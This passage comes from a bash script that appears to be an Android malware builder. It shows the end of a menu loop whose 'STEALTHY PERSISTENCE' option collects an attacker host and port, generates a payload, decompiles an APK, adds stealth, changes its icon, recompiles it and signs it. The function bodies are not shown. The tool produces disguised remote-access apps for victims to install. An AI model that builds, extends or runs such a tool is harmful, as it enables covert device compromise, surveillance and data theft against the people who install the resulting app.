                mv $apk_name.apk $path/output > /dev/null 2>&1
                error
                sleep 2
                echo
                clear
                ;;

            5)  echo -e $green "[✔] STEALTHY PERSISTENCE"
                echo -e $green
                get_lhost
                get_lport
                echo
                payload_name
                get_payload
                change_icon
                spinlong
                gen_payload
                spinlong
                apk_decomp
                stealth
                flagg
                merge_name_ico
                spinlong
                apk_comp
                spinlong
                sign     
                                          
                echo
                mv $apk_name.apk $path/output > /dev/null 2>&1
                error
                sleep 2
                echo
                clear
                ;;

                
            x)  echo -e $yellow " Good Bye !!"
                echo
                exit 0 
                ;;
            *)  echo -e $red  "【X】 Invalid Option, Please Write a Valid Number【X】"
                echo
                sleep 2
                ;;
        esac
    done
}
clear
main